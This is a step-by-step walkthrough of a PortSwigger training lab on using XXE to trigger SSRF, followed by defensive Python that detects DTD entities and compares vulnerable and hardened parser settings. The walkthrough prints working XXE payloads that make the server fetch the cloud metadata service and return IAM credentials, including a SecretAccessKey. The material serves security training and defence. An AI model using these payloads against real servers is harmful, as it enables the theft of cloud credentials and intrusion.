Exploiting XXE to perform SSRF attacks

1: Access the Lab.

Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

2: Open Burp Suite.

3: Select a product.

4: Check the stock units.

5: Send the request to the Repeater.

Shortcut key: Ctrl + R

6: Send the request.

7: Insert the following XXE payload into the XML body of the request (use straight quotes; the curly quotes a word processor produces will break the DTD).

Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

8: Replace the product ID.

Product ID: &xxe;

9: The response should contain “Invalid product ID:” followed by the response from the metadata endpoint, which will initially be a folder name.

10: Update the URL in the DTD to explore the metadata API until you reach the following path.

URL: /latest/meta-data/iam/security-credentials/admin

Complete payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>

11: This should return JSON containing the SecretAccessKey.
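The steps above show why the lab's stock-check endpoint leaks the metadata response: the server's XML parser dereferences the SYSTEM entity and copies whatever it fetched into the product ID it echoes back. As an added example (not part of this write-up and not the lab's own code), the Python below shows the two controls a defender would put in front of such an endpoint: a pre-parse screen that flags any DOCTYPE or SYSTEM entity in the request body, and a SAX parser with external general entities disabled, shown beside the vulnerable configuration so the difference is visible. The element names (stockCheck, productId, storeId), the resolver that stands in for the server's HTTP fetch, and the metadata reply are all constructed assumptions; no network access happens.

```python
import io
import re
import urllib.parse
import xml.sax
from xml.sax import handler, xmlreader

# Constructed sample bodies (element names assumed; they are not taken from the lab).
# The first carries the page's final DTD payload, the second is a benign stock check.
METADATA_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"
STOCK_CHECK_XXE = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "' + METADATA_URL.encode() + b'"> ]>\n'
    b"<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
)
STOCK_CHECK_CLEAN = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)
# Constructed stand-in for the metadata endpoint's reply: placeholder values, not real credentials.
FAKE_METADATA = b'{"AccessKeyId":"PLACEHOLDER-KEY-ID","SecretAccessKey":"PLACEHOLDER-SECRET"}'

# --- Layer 1: screen the raw body before it reaches any XML parser ---------------------
LINK_LOCAL_OR_LOOPBACK = ("169.254.169.254", "127.0.0.1", "localhost")
ENTITY_SYSTEM_RE = re.compile(rb'<!ENTITY\s+%?\s*\S+\s+SYSTEM\s+["\']([^"\']+)["\']', re.IGNORECASE)


def inspect_xml_body(body: bytes) -> list:
    """Return findings for a request body; an empty list means nothing DTD-related was seen.
    A stock-check body has no legitimate reason to carry a DOCTYPE at all."""
    findings = []
    if re.search(rb"<!DOCTYPE", body, re.IGNORECASE):
        findings.append("DOCTYPE present")
    for match in ENTITY_SYSTEM_RE.finditer(body):
        url = match.group(1).decode("ascii", "replace")
        host = urllib.parse.urlsplit(url).hostname or ""
        kind = "internal target" if host in LINK_LOCAL_OR_LOOPBACK else "external entity"
        findings.append(f"{kind}: {url}")
    return findings


# --- Layer 2: parse with external general entities disabled ----------------------------
class RecordingResolver(handler.EntityResolver):
    """Stands in for the server-side fetch a vulnerable parser would perform (assumption).
    Records every external entity URL requested and answers with the canned body, so the
    example runs offline; in a real deployment this would be the parser's HTTP client."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        source = xmlreader.InputSource(systemId)
        source.setByteStream(io.BytesIO(FAKE_METADATA))
        return source


class StockCheckHandler(handler.ContentHandler):
    """Collects the text of each element so we can see what ends up in productId."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_stock_check(body: bytes, allow_external_entities: bool, resolver=None) -> dict:
    """Parse a stock-check body. allow_external_entities=True reproduces the vulnerable
    configuration (the parser dereferences SYSTEM entities); False is the hardened one,
    where the reference is dropped and nothing is fetched."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    if resolver is not None:
        parser.setEntityResolver(resolver)
    collector = StockCheckHandler()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(body))
    return collector.fields


if __name__ == "__main__":
    print("screening:", inspect_xml_body(STOCK_CHECK_XXE))
    vulnerable = RecordingResolver()
    print("vulnerable productId:", parse_stock_check(STOCK_CHECK_XXE, True, vulnerable)["productId"])
    print("URLs fetched:", vulnerable.requested)
    hardened = RecordingResolver()
    print("hardened productId:", repr(parse_stock_check(STOCK_CHECK_XXE, False, hardened)["productId"]))
    print("URLs fetched:", hardened.requested)
```

With the vulnerable setting the product ID comes back as the fake metadata document and the resolver records one request to the link-local address, which is exactly the behaviour the lab exploits; with the hardened setting the product ID is empty and nothing is requested. The pre-parse screen is the cheaper control and is the one a WAF or API gateway can apply, since an ordinary client never sends a DOCTYPE to this endpoint.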

12: The Lab has been completed.
